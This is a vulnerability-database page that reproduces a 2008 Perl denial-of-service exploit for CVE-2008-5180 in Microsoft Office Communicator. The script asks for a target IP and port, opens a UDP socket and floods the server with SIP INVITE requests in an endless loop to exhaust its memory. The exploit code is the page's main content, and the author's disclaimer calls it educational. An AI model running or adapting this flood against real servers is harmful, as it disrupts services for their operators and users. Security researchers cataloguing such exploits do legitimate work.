Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormPraveen DarshanamPACKETSTORM:72375
HistoryNov 29, 2008 - 12:00 a.m.

msoffice-dos.txt

2008-11-2900:00:00
Praveen Darshanam
packetstormsecurity.com
20

0.63 Medium

EPSS

Percentile

97.9%

JSON
`#!usr/bin/perl -w  
  
################################################################################################################  
# Microsoft Communicator allows remote attackers to cause a denial of service (memory consumption) via  
# a large number of SIP INVITE requests, which trigger the creation of many sessions.  
#  
# Refer:  
# http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5180  
# http://xforce.iss.net/xforce/xfdb/46673  
#  
#  
# To run this exploit on MS Windows replace "#!usr/bin/perl -w" with "#!Installation_path_for_perl -w"  
# (say #!C:/Program Files/Perl/bin/perl -w)  
#  
# This was strictly written for educational purpose. Use it at your own risk.  
# Author will not bare any responsibility for any damages watsoever.  
#  
# Author: Praveen Darshanam  
# Email: praveen[underscore]recker[at]sify.com  
# Date: 27th November, 2008  
#  
# NOTE: Thanks to all my colleagues at iPolicy Networks for making this possible.  
# For reliable security solutions please visit http://www.ipolicynetworks.com/  
#  
##################################################################################################################  
  
  
use IO::Socket;  
  
print("\nEnter IP Address of Vulnerable MS Communicator Server: \n");  
$vuln_host_ip = <STDIN>;  
  
############################################################  
#default port on which SIP works is UDP 5060  
#go thru http://technet.microsoft.com/en-us/library/bb963969.aspx for default ports  
###################  
  
print("\nEnter UDP port for MS Communicator Server: \n");  
$port = <STDIN>;  
  
$sock_sip = IO::Socket::INET->new( PeerAddr => $vuln_host_ip,  
PeerPort => $port,  
Proto => 'udp') || "Unable to create Socket";  
#if the server is configured on TCP replace 'udp' with 'tcp'.  
  
while(1)  
{  
print $sock_sip "INVITE sip:arpman.malicious.com SIP/2.0\r\nVia: SIP/2.0/UDP 172.16.16.4;branch=123-4567-900\r\n";  
  
  
#kill by pressing Ctrl+c to stop flood of packets  
}  
  
#program never comes here for execution  
close($sock_sip);  
  
`

Related

cvelist 1
prion 1
nvd 1
seebug 1
cve 1
exploitpack 1
exploitdb 1
cvelist
cvelist
CVE-2008-5180
2008-11-20 15:00:00
prion
prion
Code injection
2008-11-20 15:30:00
nvd
nvd
CVE-2008-5180
2008-11-20 15:30:00
seebug
seebug
Microsoft Office Communicator (SIP) Remote Denial of Service Exploit
2008-11-29 00:00:00
cve
cve
CVE-2008-5180
2008-11-20 15:30:00
exploitpack
exploitpack
Microsoft Office - Communicator SIP Remote Denial of Service
2008-11-28 00:00:00
exploitdb
exploitdb
Microsoft Office - Communicator &#039;SIP&#039; Remote Denial of Service
2008-11-28 00:00:00

0.63 Medium

EPSS

Percentile

97.9%

JSON
Related for PACKETSTORM:72375
cvelist1prion1nvd1seebug1cve1exploitpack1exploitdb1